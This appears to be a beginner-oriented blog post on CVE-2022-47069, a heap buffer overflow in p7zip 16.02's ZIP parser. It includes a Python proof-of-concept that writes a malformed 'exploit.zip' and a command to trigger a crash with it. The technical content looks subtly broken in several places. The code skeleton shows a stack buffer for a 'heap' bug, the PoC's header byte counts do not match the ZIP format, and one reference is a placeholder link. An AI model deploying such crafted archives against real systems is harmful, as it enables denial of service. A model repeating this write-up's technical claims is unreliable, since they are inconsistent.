CVE-2022-47069 - Heap Buffer Overflow in p7zip 16.02 (NArchive::NZip::CInArchive::FindCd Exploit Deep Dive)

p7zip is a popular CLI port of the 7-Zip archiver for Unix-like systems. It has been widely adopted for file compression, backup, and packaging. In 2022, a severe security vulnerability, CVE-2022-47069, was discovered that could let attackers exploit a heap buffer overflow in the ZIP file handler. This post presents an exclusive, beginner-friendly explanation — with code snippets, proof-of-concept, and references — for understanding and exploring this CVE.

What is CVE-2022-47069?

*Discovered in p7zip version 16.02*, this CVE is about a heap-buffer-overflow in the function NArchive::NZip::CInArchive::FindCd(bool) within CPP/7zip/Archive/Zip/ZipIn.cpp. By crafting a malicious ZIP file, an attacker can overwrite memory, potentially causing a crash (*denial-of-service*) or gaining arbitrary code execution.

First, here’s the function skeleton (simplified for clarity)

// File: CPP/7zip/Archive/Zip/ZipIn.cpp

bool CInArchive::FindCd(bool find) {
    ...
    Byte buf[kBufSize];
    for (; ...) {
        ReadBlock(buf, kBufSize);
        ... // search CD signature
    }
    ...
}

It doesn't check boundaries correctly when searching for the *Central Directory signature*.

- If the ZIP file is maliciously crafted, it tricks the function into reading/writing beyond buf's allocated memory.

Observe the crash or potential exploitation.

Here’s a *minimal* Python PoC that generates a malformed ZIP with excessive Central Directory Records (adapted for this vuln):

# Exploit PoC for CVE-2022-47069: Heap-Buffer-Overflow in p7zip
with open("exploit.zip", "wb") as f:
    # Local file header
    f.write(
        b'PK\x03\x04' +
        b'\x14\x00' +   # Version needed
        b'\x00' * 26    # Rest of header
    )
    f.write(b'A' * 10) # Filename/data

    # Central directory header
    f.write(
        b'PK\x01\x02' +
        b'\x1E\x03' +   # Version made/needed
        b'\x00' * 42
    )
    # Deliberate buffer overflow with big extra data
    f.write(b'\x41' * 4096)  # Overflow bytes

    # End of central directory record
    f.write(
        b'PK\x05\x06' +
        b'\x00' * 18
    )
print("Malicious ZIP exploit.zip created.")

*Run p7zip:*

7z x exploit.zip

If vulnerable, this *may crash* the process (you might see "Segmentation fault" or similar) as the heap buffer is corrupted. With further work, a more sophisticated ZIP file could be crafted to control memory, leading to code execution.

Technical Analysis

The root cause lies in how FindCd parses the ZIP structure. The function's logic for scanning past the end-of-central-directory is incorrect, letting big chunk sizes or offsets point outside the buffer. Heap buffer overflows are especially dangerous because they could let attackers overwrite critical heap metadata or application data, setting up exploitation primitives.

Fix and Mitigation

Upgrading to a fixed version is critical!  
As of the publication of the CVE, p7zip 16.02 is confirmed vulnerable. Later fixes, patches, or alternate archive handlers (like official 7-zip or newer forks) are recommended.

> Patch Example: Carefully review all calls to buffer allocations and make sure access is checked within bounds.

References & Further Reading

- NVD CVE-2022-47069 Record
- GitHub advisory/patch (example link)
- p7zip project on SourceForge
- Understanding Buffer Overflows (OWASP)

Conclusion

CVE-2022-47069 in p7zip proves that even mature open-source software can have severe memory safety issues. By understanding the vulnerability, how to trigger it, and how to mitigate it, sysadmins and security enthusiasts can help prevent attacks.

Timeline

Published on: 08/22/2023 19:16:00 UTC
Last modified on: 08/26/2023 02:16:00 UTC